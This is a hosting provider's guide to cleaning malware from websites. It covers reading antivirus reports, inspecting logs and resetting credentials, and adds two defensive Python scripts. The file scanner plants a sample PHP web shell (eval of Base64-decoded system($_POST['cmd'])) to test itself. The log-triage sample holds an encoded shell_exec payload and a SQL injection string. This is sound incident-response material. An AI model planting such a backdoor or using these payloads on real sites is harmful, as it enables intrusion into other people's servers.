2.15.2.2. Virus cleaning

Attention!

Hosting technical support cannot provide precise instructions on how to remove viruses. All information on this page is advisory and is not an exact guide to cleaning a site. Removal must be performed by you or with the help of third-party specialists.

When the hosting antivirus finds malicious code during a scan, a notification describing the problem is sent to the owner of the hosting account. The malicious code must be removed: its presence endangers the data of both the infected site and the neighbouring sites in the same hosting account.

Remove malicious code only after reading the antivirus report and analysing the code itself. Careless removal quite often breaks the site, because the malicious fragment is usually inserted into important scripts of the site engine.

In most cases a complete cleanup of the viruses is still not enough to secure the site: the source of the infection must also be found and eliminated. Without that, re-infection is only a matter of time.

It is recommended to use additional site-checking services as well, for example WPScan for WordPress sites.

Attention!

Before taking any action, create a backup of the site and its database and download it to your own device, so that important data can be recovered if something goes wrong.

There are several ways to remove viruses:

Attention!

We update the antivirus signature database regularly, so a virus may have been present on the site for a long time and will then also be present in the backups.
For an infected functions.php file of a WordPress theme, a separate instruction is available.

To clean your hosting account of malicious code, read the antivirus report and deal with every finding in it. Open each infected file, examine its contents carefully and delete the fragments of malicious code. The antivirus highlights only the signatures it found; malicious code may also be present in other parts of the file without being highlighted, so check the whole file and remove anything suspicious. Delete an infected file outright only if it consists entirely of malicious code.

Alternatively, replace the site files wholesale with identical ones from your own backup copy or from official sources. For example, most WordPress files can be found in the WordPress repository on GitHub. Configuration files, uploads and custom themes are not part of the official distribution and must still be checked by hand.

To search for and edit files, use the file manager in the control panel or any FTP client.

Pay attention to Base64-encoded code: malicious code is very often hidden in this form. Such an encoded section can be decoded, for example, with this service.

Dangerous PHP functions include eval, exec, shell_exec, system, passthru and similar, as well as the decoding helpers they are usually combined with, such as base64_decode, gzinflate and str_rot13. Pay special attention to every occurrence of these functions, as they are often used in malicious code; legitimate code uses them too, so each hit has to be checked, not deleted blindly.
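The manual check described above (open every PHP file, look for dangerous functions, find Base64 blobs and decode them) can be done for a whole directory tree with a short script. The following is an example added to this page, not a tool of the hosting provider or of its antivirus. The function list, the 40-character Base64 threshold and the sample "infected" theme file it creates in a temporary directory are all assumptions made for the example.

```python
"""Scan a site directory for the indicators listed above: calls to dangerous
PHP functions and long Base64 blobs that decode to PHP code.
Added example; not the hosting provider's antivirus. The sample site it
scans is constructed in a temporary directory."""
import base64
import os
import re
import tempfile

# Functions that execute or obfuscate code. Each hit needs a manual look:
# some are legitimate, but they are rarely combined as malware combines them.
DANGEROUS_FUNCS = re.compile(
    r"\b(eval|exec|shell_exec|system|passthru|assert|create_function|"
    r"base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# Runs of Base64 text long enough to hide a payload (40 is a heuristic).
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_blob(blob):
    """Decoded text of a Base64 blob, or None if it is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a subclass of ValueError
        return None


def scan_file(path):
    """Findings for one file: dicts with file, line, kind and detail."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for m in DANGEROUS_FUNCS.finditer(line):
                findings.append({"file": path, "line": lineno,
                                 "kind": "dangerous_function",
                                 "detail": m.group(1).lower()})
            for m in B64_BLOB.finditer(line):
                decoded = decode_blob(m.group(0))
                # Report only blobs that decode to something PHP-like;
                # images and fonts embedded as Base64 are left alone.
                if decoded and ("<?php" in decoded or DANGEROUS_FUNCS.search(decoded)):
                    findings.append({"file": path, "line": lineno,
                                     "kind": "base64_payload",
                                     "detail": decoded.strip()[:80]})
    return findings


def scan_directory(root, extensions=(".php", ".phtml", ".inc")):
    """Walk `root` and scan every file with a PHP-like extension."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(extensions):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


def make_sample_site():
    """Constructed sample: a clean index.php and a theme functions.php with
    an injected eval(base64_decode(...)) backdoor. Returns the directory."""
    root = tempfile.mkdtemp(prefix="site-")
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write('<?php\nrequire "wp-blog-header.php";\n')
    payload = base64.b64encode(
        b'if(isset($_POST["cmd"])){system($_POST["cmd"]);}').decode()
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write('<?php\nadd_action("init", "demo_setup");\n'
                 'eval(base64_decode("%s"));\n' % payload)
    return root


if __name__ == "__main__":
    for f in scan_directory(make_sample_site()):
        print("%s:%d %s %s" % (f["file"], f["line"], f["kind"], f["detail"]))
```

Run it against a copy of the site, not the live directory, and treat the output as a list of places to read, not a list of lines to delete: the text above stresses that the signature is only the part the scanner recognised.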

To find the source of the infection, analyse the site logs for suspicious requests. Start with the log entries around the date of last modification of the infected files.

Attention!

The modification date does not accurately indicate when the infected files were created, and it must not be the only thing you rely on. The site may have been infected much earlier, with the files detected by our antivirus appearing later because of some "trigger" 1).

Suspicious requests include:

  • POST and PUT requests.
  • Requests to the site admin panel from unknown IP addresses.
  • Requests to protected directories such as system or storage 2).
  • Requests whose parameters contain Base64-encoded text or SQL queries.
  • Requests to recently installed plugins.

Besides the web-server logs, also check the FTP logs, the outgoing-connection logs and the control panel authorization logs. If suspicious entries are found, change the passwords of the FTP users, the database users 3) and the account itself, and additionally enable two-step authentication. New strong passwords can be generated on this page. If outgoing connections were found that should not be made, you can restrict all or selected outgoing connections for the whole hosting account while the problem is being dealt with.
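The log review described above (POST and PUT requests, admin-panel access from unknown addresses, protected directories, Base64 or SQL in parameters, recently installed plugins, all narrowed to the time around the infected file's modification date) is mechanical enough to script. The following is an example added to this page, not a tool of the hosting provider. The log lines, the IP addresses (RFC 5737 documentation ranges), the plugin name `cheap-seo`, the admin-path and protected-directory lists and the file timestamp are all constructed for the example.

```python
"""Triage a web-server access log ("combined" format) for the request
types the text above calls suspicious. Added example, not a provider
tool; all sample data below is constructed."""
import base64
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Apache/nginx combined log format; referer and user agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
ADMIN_PATHS = ("/wp-admin/", "/wp-login.php", "/administrator/", "/admin/")
PROTECTED_DIRS = ("/system/", "/storage/")   # depends on the CMS (assumed)
B64_PARAM = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SQL_PARAM = re.compile(r"(union\s+select|select\s.+\sfrom|'\s*or\s|sleep\s*\()",
                       re.IGNORECASE)


def parse_line(line):
    """One log line -> dict with ip, time (aware datetime), method, path,
    decoded query string; None if the line does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"], _, query = rec["target"].partition("?")
    rec["query"] = unquote(query)     # %27 -> ' etc., so patterns match
    return rec


def reasons_for(rec, trusted_ips, recent_plugins):
    """List of the rules a request trips (empty list = looks normal)."""
    reasons = []
    if rec["method"] in ("POST", "PUT"):
        reasons.append("write_method")
    if rec["path"].startswith(ADMIN_PATHS) and rec["ip"] not in trusted_ips:
        reasons.append("admin_from_untrusted_ip")
    if any(d in rec["path"] for d in PROTECTED_DIRS):
        reasons.append("protected_dir")
    for blob in B64_PARAM.findall(rec["query"]):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue                  # long but not really Base64
        reasons.append("base64_param:" + decoded)
    if SQL_PARAM.search(rec["query"]):
        reasons.append("sql_in_query")
    if any("/plugins/%s/" % p in rec["path"] for p in recent_plugins):
        reasons.append("recent_plugin")
    return reasons


def find_suspicious(log_text, trusted_ips, recent_plugins, center=None, hours=None):
    """(record, reasons) for every request tripping a rule; with `center`
    and `hours`, only requests within +/- hours of that time (for example
    the modification time of an infected file)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if center is not None and abs(rec["time"] - center) > timedelta(hours=hours):
            continue
        reasons = reasons_for(rec, trusted_ips, recent_plugins)
        if reasons:
            hits.append((rec, reasons))
    return hits


# Constructed sample log and the facts an operator would know about the site.
PAYLOAD = base64.b64encode(b'echo shell_exec($_GET["cmd"]);').decode()
SAMPLE_LOG = f"""\
203.0.113.5 - - [12/Mar/2024:09:15:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2024:09:16:44 +0000] "POST /wp-content/plugins/cheap-seo/upload.php HTTP/1.1" 200 31 "-" "python-requests/2.31"
198.51.100.23 - - [12/Mar/2024:09:17:02 +0000] "GET /wp-content/uploads/2024/03/wp-cache.php?c={PAYLOAD} HTTP/1.1" 200 88 "-" "python-requests/2.31"
192.0.2.77 - - [12/Mar/2024:10:02:13 +0000] "GET /wp-login.php HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:05:00 +0000] "GET /?id=1%27%20UNION%20SELECT%20user,pass%20FROM%20users-- HTTP/1.1" 500 0 "-" "sqlmap/1.7"
10.0.0.8 - - [12/Mar/2024:10:30:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2024:11:30:00 +0000] "GET /storage/logs/app.log HTTP/1.1" 403 0 "-" "curl/8.0"
"""
TRUSTED_IPS = {"10.0.0.8"}              # the owner's own address (assumed)
RECENT_PLUGINS = {"cheap-seo"}          # installed just before the infection
INFECTED_FILE_MTIME = datetime(2024, 3, 12, 9, 17, 30, tzinfo=timezone.utc)

if __name__ == "__main__":
    for rec, reasons in find_suspicious(SAMPLE_LOG, TRUSTED_IPS, RECENT_PLUGINS,
                                        center=INFECTED_FILE_MTIME, hours=1):
        print(rec["time"].isoformat(), rec["ip"], rec["method"], rec["target"], reasons)
```

In the sample the POST to the freshly installed plugin and, a few seconds later, the first request to a new file in the uploads directory fall inside the one-hour window around the infected file's modification time; that pairing (write to a plugin, then a request to a file that should not exist) is the pattern worth looking for. The time window is a filter for a first pass only, for the reason given in the "Attention!" note above.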

After checking the logs, check the site files for third-party code. Start with the files of recently installed plugins and modules. Beware of unofficial plugins and modules, especially paid ones obtained free of charge from third-party sites. If there are any, remove them or restore the site from a backup made before they were installed.

Do not use file managers installed on the site itself. For the most part they are unsafe and pose a serious threat.

Attention!

All sites in one hosting account can be infected at once through a vulnerability in any one of them. Sites can be fully isolated from each other only by placing them in separate hosting accounts.

To keep the site secure afterwards, read the protection recommendations.


1)
Sending specific requests, running scripts, updating files from remote servers, etc.
2)
Depending on the CMS used, some directories are system directories of the site and must be protected from outside access.
3)
After changing the database passwords, you will need to update the connection settings in the sites' configuration files, as described in these instructions.